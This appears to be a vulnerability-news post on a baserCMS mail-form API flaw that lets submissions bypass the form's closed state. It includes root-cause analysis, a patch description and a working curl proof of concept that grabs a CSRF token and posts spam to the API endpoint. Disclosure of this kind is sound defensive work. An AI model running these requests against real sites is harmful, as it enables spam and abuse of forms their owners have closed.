baserCMS, Mail Form API Bypass, (Critical)

Listen to this Post

The vulnerability exists because the public API endpoint for mail submissions does not enforce the same acceptance checks as the front-end UI. In the UI flow, the `MailFrontService::isAccepting()` method is called by `MailController::index()` and `MailController::confirm()` to verify that the mail form is currently configured to accept submissions (e.g., within its publish window). However, the API endpoint `MailMessagesController::add()` in `plugins/bc-mail/src/Controller/Api/MailMessagesController.php` does not invoke this method. As a result, the API processes submissions without checking the form’s acceptance state. The endpoint is public and does not require authentication beyond a valid CSRF cookie and token. An attacker can obtain these by accessing the site root, then send a POST request to the API with form data. The server responds with `200 OK` and creates a mail message, bypassing administrative controls intended to stop form intake, enabling spam and abuse.
Platform: baserCMS
Version: Unspecified
Vulnerability: Business logic bypass
Severity: Critical
date: 2026-03-31

Prediction: Patch within 30 days

What Undercode Say:

Obtain CSRF cookie
curl -sS -D - -o - -c cookies.txt 'http://target/'
Extract CSRF token from cookie and submit bypass
curl -sS -X POST 'http://target/baser/api/bc-mail/mail_messages/add/1.json' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Referer: http://target/' \
-H "X-CSRF-Token: $(grep csrfToken cookies.txt | cut -f7)" \
-b cookies.txt \
--data-urlencode 'name_1=Spam' \
--data-urlencode '[email protected]' \
--data-urlencode 'message=Bypass'

Exploit:

Send crafted POST request to API endpoint with valid CSRF token while form is administratively closed.

Protection:

Apply patch that adds `MailFrontService::isAccepting()` check in `MailMessagesController::add()`.

Impact:

Unauthorized mail submissions, spam campaigns, and operational disruption.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top